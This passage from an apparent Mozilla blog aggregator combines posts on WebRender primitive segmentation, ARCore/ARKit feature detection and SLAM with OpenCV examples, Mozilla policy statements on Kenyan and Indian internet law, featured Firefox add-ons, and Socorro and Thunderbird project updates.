Well, we don’t really need to render whole primitives at a time. For a transformed primitive we can always extract out the opaque part of the primitive and render the anti-aliased edges separately. Likewise, we can break rounded rectangles up into smaller opaque rectangles and the rectangles that contain the corners. We call this primitive segmentation and it helps at several levels: opaque segments can move to the opaque pass, which means we get good memory bandwidth savings and better batching, since batching complexity is mostly affected by the amount of work to perform during the blend pass. This also opens the door to interesting optimizations. For example we can break a primitive into segments, not only depending on the shape of the primitive itself, but also on the shape of masks that are applied to it. This lets us create large rounded rectangle masks where only the rounded parts of the masks occupy significant amounts of space in the mask. More generally, there are a lot of complicated elements that can be reduced to simpler or more compact segments by applying the same family of tricks and rendering them as nine-patches or some more elaborate patchwork of segments (for example the box-shadow of a rectangle).

Segmented primitives

The way we represent this on the GPU is to pack all of the primitive descriptions in a large float texture. For each primitive we first pack the per-primitive data followed by the per-segment data. We dispatch instanced draw calls where each instance corresponds to a segment’s quad. The vertex shader finds all of the information it needs from the primitive offset and segment id of the quad it is working on.
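As a rough illustration of the idea (this is a toy sketch in Python, not WebRender's actual data layout or shader code), the packing might look something like this: primitive data goes into one flat float array, and each instanced quad records which primitive and segment it belongs to.

    # Illustrative sketch only: pack per-primitive data followed by per-segment
    # rects into one flat float array (standing in for the float texture), and
    # build an instance list of (primitive_offset, segment_index) pairs that a
    # vertex shader could use to look up its data.

    gpu_data = []      # stands in for the float texture
    instances = []     # one entry per segment quad to draw

    primitives = [
        # (color rgba, [segment rects as (x, y, w, h)])
        ((1.0, 0.0, 0.0, 1.0), [(0, 0, 100, 10), (0, 10, 100, 80), (0, 90, 100, 10)]),
        ((0.0, 0.0, 1.0, 1.0), [(200, 0, 50, 50)]),
    ]

    for color, segments in primitives:
        prim_offset = len(gpu_data)
        gpu_data.extend(color)                      # per-primitive data first
        for seg_index, rect in enumerate(segments):
            gpu_data.extend(rect)                   # then per-segment data
            instances.append((prim_offset, seg_index))

    # An instanced draw call would render one quad per entry in `instances`;
    # the shader would read the primitive data at `prim_offset` and the segment
    # rect at `prim_offset + 4 + seg_index * 4`.
    print(len(instances), "segment quads,", len(gpu_data), "floats of GPU data")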

The idea of breaking complicated primitives up into simpler segments isn’t new nor ground breaking, but I think that it is worth mentioning in the context of WebRender because of how well it integrates with the rest of our rendering architecture.

Notable WebRender and Gecko changes

  • Jeff fixed some issues with blob image recoordination.
  • Dan improved the primitive interning mechanism in WebRender.
  • Kats fixed a bug with position:sticky.
  • Kats fixed a memory leak.
  • Kats improved the CI.
  • Kvark fixed a crash caused by empty regions in the texture cache allocator.
  • Kvark fixed a division by zero in a shader.
  • Matt improved to the frame scheduling logic.
  • Matt fixed a hit-testing issue with opacity:0 divs.
  • Matt fixed a blob image validation issue.
  • Matt improved the performance of text DrawTargets.
  • Matt prevented opacity:0 animation from generating lots of CPU work.
  • Matt fixed a pixel snapping issue.
  • Matt reduced the number of YUV shader permutations.
  • Lee fixed a bug in the FreeType font backend that caused all sub-pixel AA text to be shifted by a pixel.
  • Lee implemented font variation on Linux.
  • Emilio fixed a clipping issue allowing web content to draw over the tab bar.
  • Emilio fixed a border rendering corruption.
  • Glenn added support for picture caching when the content rect changes between display lists.
  • Glenn fixed some picture caching bugs (2, 3, 4, 5).
  • Glenn removed redundant clustering information.
  • Glenn fixed a clipping bug.
  • Sotaro and Bobby lazily initialized D3D devices.
  • Sotaro fixed a crash on Wayland.
  • Bobby improved memory usage.
  • Bobby improved some of the debugging facilities.
  • Bobby shrunk the size of some handles using NonZero.
  • Bobby improved the shader hashing speed to help startup.
  • Glenn fixed a picture caching bug with multiple scroll roots.
  • Glenn improved the performance of picture caching.
  • Glenn followed up with more picture caching improvements.

Ongoing work

The team is going through the remaining release blockers.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.

Note that it is possible to log in with a github account.

RabimbaARCore and Arkit: What is under the hood : Anchors and World Mapping (Part 1)

Reading Time: 7 min
Some of you know I have recently been experimenting a bit more with WebXR rather than WebVR, and when we talk about mobile Mixed Reality, ARKit and ARCore are what play a pivotal role in mapping and understanding the environment inside our applications.

I am planning to write a series of blog posts on how you can start developing WebXR applications now and play with them, starting with the basics and then going on to use its different features. But before that, I planned to pen down this series on how the "world mapping" actually works in ARCore and ARKit, so that we have a better understanding of the Mixed Reality capabilities of the devices we will be working with.

Mapping: feature detection and anchors

Creating apps that work seamlessly with ARCore/ARKit requires a little bit of knowledge about the algorithms that work behind the scenes, and that involves knowing about anchors.

What are anchors:

Anchors are your virtual markers in the real world. As a developer, you anchor any virtual object to the real world, and that 3d model will stay glued to the physical location in the real world. Anchors also get updated over time depending on the new information that the system learns. For example, if you anchor a pikachu 2 ft away from you and then you actually walk towards your pikachu and the system realises the actual distance is 2.1 ft, it will compensate for that. In real life we have a static coordinate system where every object has its own x, y, z coordinates. Anchors in devices like HoloLens override the rotation and position of the transform component.
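Conceptually (this is just an illustrative sketch, not ARCore's or ARKit's actual API), you can think of an anchor as a pose expressed relative to a trackable, so that a correction to the trackable's estimate automatically carries over to everything anchored to it:

    # Conceptual sketch: an anchor stores an offset relative to a trackable, so
    # when the system refines its estimate of the trackable's position, objects
    # attached to the anchor move with it.

    class Trackable:
        def __init__(self, position):
            self.position = position            # world-space estimate (x, y, z)

    class Anchor:
        def __init__(self, trackable, offset):
            self.trackable = trackable
            self.offset = offset                # fixed offset from the trackable

        def world_position(self):
            return tuple(t + o for t, o in zip(self.trackable.position, self.offset))

    plane = Trackable(position=(0.0, 0.0, 2.0))     # initially believed 2.0 ft away
    pikachu = Anchor(plane, offset=(0.0, 0.0, 0.0))
    print(pikachu.world_position())                  # (0.0, 0.0, 2.0)

    plane.position = (0.0, 0.0, 2.1)                 # system learns it was 2.1 ft
    print(pikachu.world_position())                  # the pikachu is corrected too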

How Anchors stick?

If we follow the documentation of Google ARCore, we see that an anchor is attached to something called "trackables", which are feature points and planes in an image. Planes are essentially clustered feature points. You can have a more in-depth look at what Google says an ARCore anchor does by reading their really nice Fundamentals. But for our purposes, we first need to understand what exactly these Feature Points are.

Feature Points: through the eyes of computer vision

Feature points are distinctive markers on an image that an algorithm can use to track specific things in that image. Normally any distinctive pattern, such as T-junctions or corners, is a good candidate. Alone, they are not too useful for distinguishing between each other and reliably placing a marker on an image, so the neighbouring pixels of that image are also analyzed and saved as a descriptor.
Now a good anchor should have reliable feature points attached to it. The algorithm must be able to find the same physical space under different viewpoints. It should be able to accommodate changes in:
  • Camera Perspective
  • Rotation
  • Scale
  • Lighting
  • Motion blur and noise
Reliable Feature Points
This is an open research problem with multiple solutions, each with its own set of trade-offs. One of the most popular algorithms, Scale Invariant Feature Transform (SIFT), stems from a paper by David G. Lowe in IJCV. A follow-up work that claims even better speed, Speeded Up Robust Features (SURF) by Bay et al., was published at ECCV in 2006. Both of them are patented at this point, though.

Microsoft HoloLens doesn't really need to do all this heavy lifting since it can rely on an extensive amount of sensor data, especially depth data from its infrared sensors. However, ARCore and ARKit don't enjoy those privileges and have to work with 2d images. Though we cannot say for sure which algorithm ARKit or ARCore actually uses, we can try to replicate the process with a patent-free algorithm to understand how it works.

D.I.Y Feature Detection and keypoint descriptors

To understand the process we will use an algorithm by Leutenegger et al. called BRISK. To detect features we must follow a multi-step process. A typical algorithm would adhere to the following two steps:
  1. Keypoint Detection: Detecting keypoints can be as simple as just detecting corners, which essentially evaluates the contrast between neighbouring pixels. A common way to do that in a large-scale image is to blur the image to smooth out pixel contrast variation and then do edge detection on it. The rationale for this is that you would normally want to detect a tree and a house as a whole to achieve reliable tracking, instead of every single twig or window. SIFT and SURF adhere to this approach. However, for real-time scenarios blurring adds a compute penalty which we don't want. In their paper "Machine Learning for High-Speed Corner Detection", Rosten and Drummond proposed a method called FAST, which analyzes the circular surrounding of each pixel p. If the neighbouring pixels' brightness is lower or higher than that of p by a threshold, and a certain number of connected pixels fall into this category, then the algorithm has found a corner.
    Image credits: Rosten E., Drummond T. (2006). Machine Learning for High-Speed Corner Detection. Computer Vision – ECCV 2006.
    Now back to BRISK: for it, out of the 16-pixel circle, 9 consecutive pixels must be brighter or darker than the central one. BRISK also uses down-sized images, allowing it to achieve better invariance to scale.
  2. Keypoint Descriptor: The primary property of the detected keypoints should be that they are unique. The algorithm should be able to find the same feature in a different image, from a different viewpoint and under different lighting. BRISK compares the brightness of pairs of pixels surrounding the centre keypoint and concatenates the comparison results into a 512-bit string.
    Image credits: S. Leutenegger, M. Chli and R. Y. Siegwart, “BRISK: Binary Robust invariant scalable keypoints”, 2011 International Conference on Computer Vision
    As we can see from the sample figure, the blue dots create the concentric circles and the red circles indicate the individually sampled areas. Based on these, the results of the brightness comparison are determined. BRISK also ensures rotational invariance. This is calculated from the largest gradients between two samples with a long distance from each other.

Test out the code

To test out the algorithms we will use the reference implementations available in OpenCV. We can install it with its Python bindings via pip.
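For example (the main opencv-python wheel includes the features2d module that provides BRISK):

    pip install opencv-python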

As test images, I used two pictures I had previously captured for my talks at All Things Open and a TechSpeaker meetup. One is an evening shot of the Louvre, which should have enough corners as well as overlapping edges; the other is a picture of my friend in a beer garden, taken in portrait mode, to see how the algorithm fares against the blur already present in the image.

Original Image Link

Original Image Link
Visualizing the Feature Points
We use the small code snippet below to run BRISK on the two images above and visualize the feature points.
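A minimal reconstruction of such a snippet, based on the steps described below and OpenCV's Python bindings (the image filename is an assumption), looks like this:

    import cv2

    # 1. Load the image and convert it to grayscale
    img = cv2.imread("louvre.jpg")
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    # 2. Initialize BRISK with an increased threshold (70) and 4 octaves
    brisk = cv2.BRISK_create(thresh=70, octaves=4)

    # 3. detectAndCompute() returns the keypoints and their binary descriptors
    keypoints, descriptors = brisk.detectAndCompute(gray, None)

    # 4. Draw the keypoints; circle diameter and angle show size and orientation
    out = cv2.drawKeypoints(
        img, keypoints, None,
        flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
    cv2.imwrite("louvre_brisk.png", out)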


What the code does:
  1. Loads the JPEG into a variable and converts it to grayscale
  2. Initialize BRISK and run it. We use the paper-suggested 4 octaves and an increased threshold of 70. This ensures we get a low number of highly reliable keypoints. As we will see below, we still got a lot of keypoints
  3. We use detectAndCompute() to get two arrays from the algorithm, holding the keypoints and their descriptors
  4. We draw the keypoints at their detected positions, indicating keypoint size and orientation through circle diameter and angle; the DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS flag does that.


As you can see, most of the keypoints appear at the castle edges and other visible edges of the Louvre, and almost none on the floor. With the portrait-mode picture of my friend the result is more diverse, but it also shows some false positives like the reflection on the glass. Considering how BRISK works, this is normal.

Conclusion

In this first part of understanding what powers ARCore/ARKit, we looked at how basic feature detection works behind the scenes and tried our hand at replicating it. These spatial anchors are vital to "glueing" virtual objects to the real world. This demo and hands-on should help you understand why it is a good idea to design your apps so that users place objects in areas where the device has a chance to create anchors.
Placing a lot of objects on a single non-textured smooth plane may produce an inconsistent experience, since it's just too hard to detect keypoints on a plain surface (now you know why). As a result, the objects may sometimes drift away if tracking is not good enough.
If your app design encourages placing objects near the corners of a floor or table, then the app has a much better chance of working reliably. Also, Google's guide on anchor placement is an excellent read.

Their short recommendation is:
  • Release spatial anchors if you don’t need them. Each anchor costs CPU cycles which you can save
  • Keep the object close to the anchor. 
In our next post, we will see how we can use this knowledge to do basic SLAM.

Update: The next post lives here: https://blog.rabimba.com/2018/10/arcore-and-arkit-SLAM.html
Citation: https://www.andreasjakl.com/basics-of-ar-anchors-keypoints-feature-detection/

RabimbaARCore and Arkit, What is under the hood: SLAM (Part 2)

In our last blog post (part 1), we took a look at how algorithms detect keypoints in camera images. These form the basis of our world tracking and environment recognition. But for Mixed Reality, that alone is not enough. We have to be able to calculate the 3d position in the real world, which is typically derived from the spatial distances between the device and multiple keypoints. This is often called Simultaneous Localization and Mapping (SLAM), and it is what is responsible for all the world tracking we see in ARCore/ARKit.

What we will cover today:

  • How ARCore and ARKit do their SLAM/Visual Inertial Odometry
  • Can we D.I.Y our own SLAM with reasonable accuracy to understand the process better

Sensing the world: as a computer

When we start any augmented reality application on mobile or elsewhere, the first thing it tries to do is detect a plane. When you first start an MR app built on ARKit or ARCore, the system doesn't know anything about the surroundings. It starts processing data from the camera and pairs it up with other sensors.
Once it has that data, it tries to do the following two things:
  1. Build a point cloud mesh of the environment by building a map
  2. Assign a relative position of the device within that perceived environment
From our previous article, we know it's not always easy to build this map from unique feature points and maintain it. However, it becomes easier in certain scenarios if you have the freedom to place beacons at known locations, something we did at MozFest 2016, when Mozilla still had the Magnets project, which we used as our beacons. A similar approach is used in a few museums as their indoor navigation system, providing turn-by-turn navigation to points of interest. Augmented Reality systems, however, don't have this luxury.

A little saga about relationships

We will start with a map.....about relationships. Or rather "A Stochastic Map For Uncertain Spatial Relationships" by Smith et al. 
In the real world, you have precise and correct information about the exact location of every object. In the AR world, however, that is not the case. To understand the problem, let's assume we are in an empty room, our mobile has detected a reliable unique anchor (A) (or that can be a stationary beacon), and our position is at (B).
In a perfect situation, we know the distance between A and B, and if we want to move towards C we can infer exactly how we need to move.

Unfortunately, in the world of AR and SLAM we need to work with imprecise knowledge about the position of A and C. This results in uncertainties and the need to continually correct the locations. 

The points have a relative spatial relationship with each other, and that allows us to get a probability distribution of every possible position. Some of the common methods to deal with the uncertainty and correct positioning errors are the Kalman filter (this is what we used at MozFest), maximum a posteriori estimation, or bundle adjustment.
Since these estimations are not perfect, every new sensor update also has to update the estimation model.
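As a tiny illustration of that update loop, here is a one-dimensional, Kalman-filter-style sketch (the noise values are made up for the example): each new noisy reading nudges the estimate and shrinks the uncertainty.

    # Minimal 1D Kalman-style update: each noisy distance measurement refines
    # our estimate of where an anchor is, and the variance (uncertainty) shrinks.

    def kalman_update(estimate, variance, measurement, measurement_variance):
        """Fuse a new measurement into the current estimate."""
        kalman_gain = variance / (variance + measurement_variance)
        new_estimate = estimate + kalman_gain * (measurement - estimate)
        new_variance = (1.0 - kalman_gain) * variance
        return new_estimate, new_variance

    # Start with a rough guess: the anchor is ~2.0 ft away, but we are unsure.
    estimate, variance = 2.0, 1.0
    for measurement in [2.1, 2.05, 2.12, 2.08]:   # noisy sensor readings
        estimate, variance = kalman_update(estimate, variance, measurement, 0.1)
        print(f"estimate={estimate:.3f} ft, variance={variance:.4f}")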

Aligning the Virtual World

To map our surroundings reliably in Augmented Reality, we need to continually update our measurement data. The assumption is that every sensory input we get contains some inaccuracies. We can take help from Lu and Milios in their paper "Globally Consistent Range Scan Alignment for Environment Mapping" to understand the issue.
Image credits: Lu, F., & Milios, E. (1997). Globally consistent range scan alignment for environment mapping
Here in figure a, we see how going from position P1...Pn accumulates small measurement errors over time until the resulting environment map is wrong. But when we align the scans in figure b, the result is considerably improved. To do that, the algorithm keeps track of all local frame data and a network of spatial relations among them.
A common problem at this point is how much data to store to keep doing the above correctly. Often, to reduce complexity, the algorithm limits the number of keyframes it stores.

Let's build the map, a.k.a. SLAM

To make Mixed Reality feasible, SLAM has to handle the following challenges:
  1. Monocular camera input
  2. Real-time operation
  3. Drift

Skeleton of SLAM

How do we deal with these in a Mixed Reality scene?
We start with the principles laid out by Cadena et al. in their paper "Past, Present, and Future of Simultaneous Localization and Mapping: Toward the Robust-Perception Age". From that paper, the standard architecture of SLAM looks something like this:
Image Credit: Cadena et al
If we deconstruct the diagram, we get the following four modules (a toy sketch after the list shows how they might fit together):
  1. Sensor: On mobile, this is primarily the camera, augmented by the accelerometer, the gyroscope and, depending on the device, a light sensor. Apart from Project Tango enabled phones, no Android device had a depth sensor.
  2. Front End: Feature extraction and anchor identification happen here, as described in the previous post.
  3. Back End: Performs error correction to compensate for drift, and also takes care of localizing the pose model and the overall geometric reconstruction.
  4. SLAM estimate: The result, containing the tracked features and their locations.
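As a purely illustrative, hypothetical sketch (not how ARCore, ARKit or any real SLAM system is implemented), the four modules could be wired together roughly like this:

    # Toy skeleton of the four SLAM modules above -- placeholder functions only.
    def extract_features(camera_frame):
        """Front end: keypoint detection and anchor identification (see part 1)."""
        return []  # placeholder: a list of detected keypoints

    def optimize(keypoints, imu_reading, world_map, previous_pose):
        """Back end: drift correction, pose localization, geometric reconstruction."""
        refined_pose = previous_pose  # placeholder: a real back end refines this
        return refined_pose, world_map

    def slam_step(camera_frame, imu_reading, world_map, previous_pose):
        # 1. Sensor: a camera frame plus accelerometer/gyroscope readings arrive.
        # 2. Front end: turn raw pixels into keypoints.
        keypoints = extract_features(camera_frame)
        # 3. Back end: fuse keypoints and inertial data into a corrected estimate.
        pose, world_map = optimize(keypoints, imu_reading, world_map, previous_pose)
        # 4. SLAM estimate: the tracked features and the device's pose within the map.
        return pose, world_map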
To better understand it, we can take a look at one of the open source implementations of SLAM.

D.I.Y. SLAM: Taking a peek at ORB-SLAM

To try our hand at understanding how SLAM works, let's take a look at a recent algorithm by Montiel et al. called ORB-SLAM. We will use the code of its successor, ORB-SLAM2. The algorithm is available on GitHub under GPLv3, and I found an excellent blog post which goes into the nifty details of how to run ORB-SLAM2 on your own computer. I highly encourage you to read it to avoid problems during setup.
The author's talk is also available here and is very interesting.


ORB-SLAM uses only the camera and doesn't utilize any gyroscope or accelerometer input. But the result is still impressive.
  1. Detecting features: ORB-SLAM, as the name suggests, uses ORB to find keypoints and generate binary descriptors. Internally, ORB is based on the same method for finding keypoints and generating binary descriptors as we discussed in part 1 for BRISK. In short, ORB-SLAM analyzes each picture for keypoints and stores them, with a reference to their keyframe, in a map. These are used later to correct historical data.
  2. Keypoint > 3D landmark: The algorithm watches for new frames from the camera and, when it finds one, performs keypoint detection on it. These keypoints are then matched against the previous frame to get spatial distances, which gives a good idea of where the same keypoints can be found again in a new frame. This provides the initial camera pose estimation.
  3. Refine camera pose: The algorithm repeats step 2 by projecting the estimated initial camera pose into the next camera frame and searching for more keypoints that correspond to the ones it already knows. If it is confident it has found them, it uses the additional data to refine the pose and correct any spatial measurement error. (A small OpenCV sketch of steps 1 and 2 follows the image below.)
Green squares = tracked keypoints. Blue boxes = keyframes. Red box = camera view. Red points = local map points.
Image credits: ORB-SLAM video by Raúl Mur Artal
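If you just want a feel for the keypoint detection and matching described in steps 1 and 2, OpenCV ships its own ORB implementation. Here is a small, hypothetical sketch (the frame file names are placeholders) that detects ORB keypoints in two consecutive frames and matches their binary descriptors using the Hamming distance:

    # Sketch: ORB keypoint detection and matching between two consecutive frames
    # using OpenCV. "frame1.png" and "frame2.png" are placeholder file names.
    import cv2

    frame1 = cv2.imread("frame1.png", cv2.IMREAD_GRAYSCALE)
    frame2 = cv2.imread("frame2.png", cv2.IMREAD_GRAYSCALE)

    orb = cv2.ORB_create(nfeatures=1000)

    # Step 1: find keypoints and compute binary descriptors in each frame.
    kp1, des1 = orb.detectAndCompute(frame1, None)
    kp2, des2 = orb.detectAndCompute(frame2, None)

    # Step 2: match descriptors (Hamming distance, since ORB descriptors are binary).
    matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    matches = sorted(matcher.match(des1, des2), key=lambda m: m.distance)

    print("%d keypoints in frame 1, %d in frame 2, %d matched"
          % (len(kp1), len(kp2), len(matches)))
    # The matched pairs are what a SLAM back end would feed into pose estimation,
    # e.g. via cv2.findEssentialMat and cv2.recoverPose for a calibrated camera.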


Returning home, a.k.a. Loop Closing

One of the goals of MR is that when you walk back to your starting point, the system should recognize that you have returned. The inherent imprecision and the accumulated error make this hard to detect accurately. In SLAM this is called loop closing. ORB-SLAM handles it by defining a threshold: it tries to match the keypoints of the current frame against previously detected keyframes, and if the matching percentage against an earlier keyframe exceeds the threshold, it knows you have returned. (A rough sketch of this matching idea follows the figures below.)
Loop Closing performed by the ORB-SLAM algorithm.
Image credits: Mur-Artal, R., Montiel
To account for the accumulated error, the algorithm then has to propagate a coordinate correction throughout the whole map, with the updated knowledge that the loop has been closed.
The reconstructed map before (up) and after (down) loop closure.
Image credits: Mur-Artal, R., Montiel
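To make the threshold idea concrete, here is a crude, hypothetical sketch (the 0.3 threshold is made up for illustration) that compares the current frame's ORB descriptors against a stored keyframe's descriptors and reports a loop when enough of them match:

    # Crude sketch of the loop-closing check: report a loop when the share of
    # matched keypoints against a stored keyframe crosses a (made-up) threshold.
    import cv2

    def looks_like_a_loop(current_descriptors, keyframe_descriptors, threshold=0.3):
        matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
        matches = matcher.match(current_descriptors, keyframe_descriptors)
        match_ratio = len(matches) / max(len(current_descriptors), 1)
        return match_ratio >= threshold

    # A real system would test the current frame against many stored keyframes and,
    # on a hit, propagate the coordinate correction through the whole map.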

SLAM today:

Google: ARCore's documentation describes its tracking method as "concurrent odometry and mapping", which is essentially SLAM plus sensor inputs. Their patent also indicates that they have incorporated inertial sensors into the design.

Apple: Apple is also using Visual Inertial Odometry, technology it acquired by buying Metaio and FlyBy. I learned a lot about what they are doing by having a look at this video from WWDC18.

Additional reading: I found the paper "A comparative analysis of tightly-coupled monocular, binocular, and stereo VINS" to be a nice read on how different IMUs are used and compared. IMUs (inertial measurement units) are the devices that provide all this sensory data to our devices today, and their calibration is supposed to be notoriously difficult.

I hope this post along with the previous one provides a better understanding of how our world is tracked inside ARCore/ARKit.

In a few days, I will start another blog series on how to build Mixed Reality applications, using experimental as well as some stable WebXR APIs to build Mixed Reality demos.
As always, feedback is welcome.


Mozilla Open Policy & Advocacy Blog: Kenya Considers Protection of Privacy and Personal Data

Mozilla applauds the government of Kenya for publishing the Data Protection Bill, 2018. This highly anticipated bill gives effect to Article 31 of the Constitution of Kenya, which protects the right to privacy, and, if passed, will be Kenya’s first data protection law.

Most notably, the bill includes:

  • An empowered and well resourced data protection commission with a high degree of independence from the government.
  • Strong obligations placed on data controllers and processors requiring them to abide by principles of meaningful user consent, collection limitation, purpose limitation, data minimization, and data security.
  • Robust protections for data subjects with the rights to rectification, erasure of inaccurate data, objection to processing of their data, as well as the right to access and to be informed of the use of their data, providing users with control over their personal data and online experiences.

This bill comes at a pivotal time. Kenya is a rapidly digitizing nation with 46.6 million mobile subscribers and a penetration rate of 97.8%. Over 99% of Kenya’s internet subscribers access the internet via mobile phones. Several government services are now available only online, compelling citizens to provide personal data to access services like registration of births. Furthermore, the Registration of Persons Act requires demographic and biometric data to be contained in an electronic national identity card, which is crucial for everyday life. All these services have accelerated the collection and analysis of personal data, but the lack of a comprehensive data protection law exposes Kenyan citizens to risks of misuse of their data.

This proposed law is therefore a welcome opportunity for the government to develop a model data protection framework that upholds individual privacy and safeguards the data of generations of Kenyans including those who are yet to come online. Kenya’s draft data protection legislation is clearly inspired by the EU’s General Data Protection Regulation, and Kenya is striving to be the first country to receive an “adequacy” determination from the European Commission — a certification that a country has strong privacy laws, and which allows Europeans’ data to be processed in that country and for companies in that jurisdiction to more easily enter European markets. This bill is also an important step toward fulfilling the African Union Convention on Cyber Security and Personal Data Protection, which calls for member states to adopt legal frameworks for data privacy and cybersecurity.

Mozilla’s comments on the Kenyan data protection bill can be found here. Our work on Kenya’s data protection bill builds on our strong commitment to user privacy and security as can be seen both in the open source code of our products as well as in our policies. We believe that strong data protection laws are critical to ensuring that user rights and the private user data that  companies and governments are entrusted with are protected. We have been actively engaged in advocating for strong data protection laws in India, Brazil, the EU, and the US, and are enthusiastic to engage in this timely and historic debate in Kenya.

We believe that a strong data protection law must protect the rights of individuals with meaningful consent at its core. It must have strong obligations placed on data controllers and processors reflecting the significant responsibilities associated with collecting, storing, using, analyzing, and processing user data; and provide for effective enforcement by an empowered, independent, and well-resourced Data Protection Authority. We’re pleased to see all of these values included in the Kenyan data protection bill.

The bill was developed in open public consultations, another crucial pillar of the Kenyan constitution, which provides the public with the opportunity to take part in government and parliamentary decision making processes. The consultations received wide ranging comments from governments, private sector, academia, civil society, and individuals. The result is a bill that Kenya should be proud of.

We commend the government for the thoughtful and thorough framework and urge Kenyan members of parliament to pass this critical data protection legislation and reconcile it with other statutes, which contain provisions that threaten the good intentions of this bill. Without a data protection law, Kenyans’ private data is currently at risk.

With this legislation, Kenya is emerging as a leader in the digital economy and we hope this will serve as a positive example to the many other African governments that are currently considering data protection frameworks.

The post Kenya Considers Protection of Privacy and Personal Data appeared first on Open Policy & Advocacy.

Mozilla Addons Blog: January’s featured extensions


Pick of the Month: Auto Tab Discard

by Richard Neomy
Save memory usage by automatically hibernating inactive tabs.

“Wow! This add-on works like a charm. My browsing experience has improved greatly.”

Featured: Malwarebytes Browser Extension

by Malwarebytes Inc.
Enhance the safety and speed of your browsing experience by blocking malicious websites like fake tech support scams and hidden cryptocurrency miners.

“Malwarebytes is the best I have used to stop ‘Microsoft alerts’ and ‘Windows warnings’.”

If you’d like to nominate an extension for featuring, please send it to amo-featured [at] mozilla [dot] org for the board’s consideration. We welcome you to submit your own add-on!

The post January’s featured extensions appeared first on Mozilla Add-ons Blog.

Mozilla Open Policy & Advocacy Blog: India attempts to turn online companies into censors and undermines security – Mozilla responds

Last week, the Indian government proposed sweeping changes to the legal protections for “intermediaries”, which affect every internet company today. Intermediary liability protections have been fundamental to the growth of the internet as an open and secure medium of communication and commerce. Whether in Section 79 of the Information Technology Act in India (under which these new rules are proposed), the EU’s E-Commerce Directive, or Section 230 of the US’ Communications Decency Act, these legal provisions ensure that companies generally have no obligation to actively censor, and face limited liability for, the illegal activities and postings of their users until they know about them. In India, the landmark Shreya Singhal judgment clarified in 2015 that companies would only be expected to remove content when directed to do so by a court order.

The new rules proposed by the Ministry of Electronics and Information Technology (MEITY) turn this logic on its head. They propose that all “intermediaries”, ranging from social media and e-commerce platforms to internet service providers, be required to proactively remove “unlawful” user content, or else face liability for content on their platform. They also propose a sharp blow to end-to-end encryption technologies, used to secure most popular messaging, banking, and e-commerce apps today, by requiring services to make available information about the creators or senders of content to government agencies for surveillance purposes.

The government has justified this move based on “instances of misuse of social media by criminals and anti-national elements”, citing lynching incidents spurred on by misinformation campaigns. We recognize that harmful content online – from hate speech and misinformation to terrorist content – undermines the overall health of the internet and stifles its empowering potential. However, the regulation of speech online necessarily calls into play numerous fundamental rights and freedoms guaranteed by the Indian constitution (freedom of speech, right to privacy, due process, etc), as well as crucial technical considerations (‘does the architecture of the internet render this type of measure possible or not’, etc). This is a delicate and critical balance, and not one that should be approached with such maladroit policy proposals.

Our five main concerns are summarised here, and we will build on these for our filing to MEITY:

  1. The proactive obligation on services to remove “unlawful” content will inevitably lead to over-censorship and chill free expression.
  2. Automated and machine-learning solutions should not be encouraged as a silver bullet to fight against harmful content on the internet.
  3. One-size-fits-all obligations for all types of online services and all types of unlawful content is arbitrary and disproportionately harms smaller players.
  4. Requiring services to decrypt encrypted data weakens overall security and contradicts the principles of data minimisation endorsed in MEITY’s draft data protection bill.
  5. Disproportionate operational obligations, like mandatorily incorporating in India, are likely to spur market exit and deter market entry for SMEs.

We do need to find ways to hold social media platforms to higher standards of responsibility, and acknowledge that building rights-protective frameworks for tackling illegal content on the internet is a challenging task. However, whittling down intermediary liability protections and undermining end-to-end encryption are blunt and disproportionate tools that fail to strike the right balance. We stress that any regulatory intervention on this complex issue must be preceded by a wide-ranging and participatory dialogue. We look forward to continued constructive engagement with MEITY and other stakeholders on this issue.


The post India attempts to turn online companies into censors and undermines security – Mozilla responds appeared first on Open Policy & Advocacy.

Will Kahn-Greene: Socorro: December 2018 happenings

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the crash reporter collects data about the crash, generates a crash report, and submits that report to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

At Mozilla, December is a rough month to get anything done, but we accomplished a bunch anyways!

Read more… (3 mins to read)

Mozilla Thunderbird: Thunderbird in 2019

From the Thunderbird team we wish you a Happy New Year! Welcome to 2019, and in this blog post we’ll look at what we got accomplished in 2018 and look forward to what we’re going to be working on this year.

Looking Back on 2018

More Eggs in the Nest

Our team grew considerably in 2018, to eight staff working full-time on Thunderbird. At the beginning of this year we are going to be adding as many as six new members to our team. Most of these people, with the exception of this author (Ryan Sipes, Community Manager), are engineers who will be focused on making Thunderbird more stable, faster, and easier to use (more on this below).

The primary reason we’ve been able to do this is an increase in donors to the project. We hope that anyone reading this will consider giving to Thunderbird as well. Donations from individual contributors are our primary source of funding, and we greatly appreciate all our supporters who made this year so successful!

Thunderbird 60

We released the latest ESR, Thunderbird 60 – which saw many improvements in security, stability, and the app’s interface. Beyond big upgrades to core Thunderbird, Thunderbird’s calendar saw many improvements as well.

For the team this was also a big learning opportunity. We heard from users who upgraded and loved the improvements, and we heard from users who encountered issues with legacy add-ons or other changes that hurt their workflow.

We listened, and will continue to listen. We’re going to build upon what made Thunderbird 60 a success, and work to address the concerns of those users who experienced issues with the update. Hiring more staff (as mentioned above) will go a long way to having the manpower needed to build even better releases going forward.

A Growing Community

Early in the year, a couple of members of the Thunderbird team visited FOSDEM – from then on we worked hard to assure our users and contributors that Thunderbird was spreading its wings and flying high again.

That work was rewarded when folks came to help us out. The folks at Ura Design worked with us on a few initiatives, including a style guide and user testing. They’ve also joined us in working on a new UX team, which we very much expect to grow, with a dedicated UX designer/developer on staff in the new year. If you are interested in contributing or following along, you can join the UX team mailing list here.

We heard from many users who were excited at the new energy that’s been injected into Thunderbird. I received many Emails detailing what our userbase loved about Thunderbird 60 and what they’d like to see in future releases. Some even said they’d like to get involved, so we made a page with information on how to do that.

We still have some areas to improve on this year, with one of them being onboarding core contributors. Thunderbird is a big, complex project that isn’t easy to jump into. So, as we closed out the year I opened a bug where we can detail what documentation needs to be created or updated for new members of the community – to ensure they can dive into the project.

Plans for 2019

